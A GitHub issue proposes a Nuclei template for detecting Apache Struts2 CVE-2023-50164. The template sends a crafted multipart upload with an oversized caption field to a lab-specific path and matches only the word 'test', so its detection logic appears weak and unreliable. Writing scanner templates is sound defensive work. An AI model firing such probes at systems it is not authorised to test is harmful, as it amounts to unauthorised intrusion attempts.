### ISSUE TITLE
Apache Struts2 CVE-2023-50164

### ISSUE THREAD

**Issue by emadshanab** [projectdiscovery/nuclei-templates#8820]
```yaml
id: apache-struts2-cve-2023-50164
info:
  name: Apache Struts2 CVE-2023-50164 Vulnerability Detection
  author: emadshanab
  severity: high
  description: Detects a directory traversal vulnerability in Apache Struts2.
  reference: 
    - https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164)
    - https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%86%E6%9E%90-S2-066/
    - https://github.com/wy876/POC/blob/8ceccb96e4ba5bbcc4227d6769bc713f08c46a3f/Apache%20Struts2%20CVE-2023-50164.md

http:
  - method: POST
    path:
      - "{{BaseURL}}/s2_066_war_exploded/upload.action"
    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
    body: |
      ------WebKitFormBoundary5WJ61X4PRwyYKlip
      Content-Disposition: form-data; name="upload"; filename="poc.txt"
      Content-Type: text/plain
      
      test
      
      ------WebKitFormBoundary5WJ61X4PRwyYKlip
      Content-Disposition: form-data; name="caption";
      
      {{randstr(4097,4097)}}
      
      ------WebKitFormBoundary5WJ61X4PRwyYKlip--
    matchers:
      - type: word
        words:
          - "test"
```
